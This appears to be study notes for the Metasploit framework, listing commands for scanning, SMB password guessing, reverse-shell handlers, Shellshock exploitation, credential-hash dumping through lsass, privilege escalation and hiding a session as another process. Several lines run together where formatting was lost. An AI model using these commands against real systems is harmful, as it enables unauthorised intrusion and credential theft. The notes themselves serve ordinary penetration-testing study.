2.0 KiB
2.0 KiB
Metasploit
Modules
- Auxiliary scanners, crawlers and fuzzers
- Encoders encode payloads
- Evasion prepare payloads to circumvent signature based malware detection
- NOPs various architectures
- Payloads to run on target systems
- Singles, inline payloads, for example generic/shell_reverse_tcp
- Stagers, downloads the stages payloads
- Stages, for example windows/x64/shell/reverse_tcp
- Post postexploitation
Notes
- Search via scope
search type:auxiliary <stuff>
- Send exploit to background
run -z
check
if target is vulnerablesetg
sets variables globallyunset payload
- Flush via
unset all
Sessions
background
orctrl+z
- Foreground via
sessions -i <number>
Scanning
- Portscan
search portscan
- UDP Sweep via
scanner/discovery/udp_sweep
- SMB Scan via
scanner/smb/smb_version
andsmb_enumshares
- SMB login dictionary attack
scanner/smb/smb_login
- NetBios via
scanner/netbios/nbname
- HTTP version
scanner/http/http_version
Database
- Start postgres
msfdb init
db_status
- Separate
workspace -a <projectname>
- Safe scans via
db_nmap
- Show
hosts
- Show
services
- Set RHOST values via
hosts -R
Exploits
show targets
show payloads
Reverse Shells
- Multihandler, set options
use exploit/multi/handler
set payload <payloadhandler>
- Shellshock as an example
use multi/http/apache_mod_cgi_bash_env_exec
Post Exploitation
load kiwi
load python
- Windows
- list SAM database
migrate <lsass.exe-PID> hashdump
- enum shares
post/windows/gather/enum_shares
- Linux
use post/linux/gather/hashdump
Other Meterpreter stuff
- Staged and in disguise running as another servicename
getpid
ps
- Attempt to elevate privileges
getsystem
- Use
multi/handler
or exploit and get an overview viashow payloads
- UserID via
getuid